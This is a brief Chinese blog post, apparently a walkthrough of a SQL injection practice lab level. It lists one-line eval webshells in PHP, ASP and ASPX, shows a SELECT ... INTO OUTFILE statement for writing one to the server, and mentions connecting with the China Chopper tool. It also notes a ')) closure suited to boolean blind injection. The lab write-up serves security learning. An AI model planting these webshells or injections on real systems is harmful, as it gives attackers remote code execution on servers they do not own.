本文发布于815天前,本文最后更新于807 天前,其中的信息可能已经过时,如有错误请留言或评论。
第一种:
页面提示outfile,尝试写入一句话木马
- php的一句话木马:<?php @eval($_POST[‘pass’]);?>
- asp的一句话木马: <%eval request (“pass”)%>
- aspx的一句话木马: <%@ Page Language=“Jscript”%> <%eval(Request.Item[“pass”],“unsafe”);%>
- select '木马语句' into outfile "路径"--+
- 然后用菜刀连接
第二种:
判断sql语句闭合符,检测后发现为'))闭合,那么它的过关方法与前几关类似选择布尔盲注就可以了。